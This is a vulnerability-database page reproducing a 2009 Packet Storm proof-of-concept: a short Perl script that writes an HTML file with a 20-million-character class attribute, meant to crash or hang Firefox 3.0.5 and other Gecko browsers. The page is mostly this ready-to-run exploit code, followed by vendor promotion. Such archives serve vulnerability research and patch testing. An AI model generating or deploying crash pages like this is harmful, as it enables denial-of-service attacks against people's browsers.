Lucene search
K

Mozilla Firefox 3.0.5 Libxul Remote Memory Leak Exploit

🗓️ 01 Jan 2009 00:00:00Reported by Jeremy BrownType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 41 Views

Mozilla Firefox 3.0.5 Libxul Remote Memory Leak Exploi

Code
`#!/usr/bin/perl  
# mzff_libxul_ml.pl  
# Mozilla Firefox 3.0.5 (Libxul) Remote Memory Leak Exploit  
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]  
# Debugging shows a near halt @ /usr/lib/xulrunner-x.x.x.x/libxul.so  
# All Gecko+Mozilla Browsers should be vulnerable  
  
$filename = $ARGV[0];  
if(!defined($filename))  
{  
  
print "Usage: $0 <filename.html>\n";  
  
}  
  
$head = "<html>" . "\n";  
$trig = "<hr class = \"" . "A" x 20000000 . "\">" . "\n";  
$foot = "</html>";  
  
$data = $head . $trig . $foot;  
  
open(FILE, '>' . $filename);  
print FILE $data;  
close(FILE);  
  
exit;`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jan 2009 00:00Current
0.1Low risk
Vulners AI Score0.1
41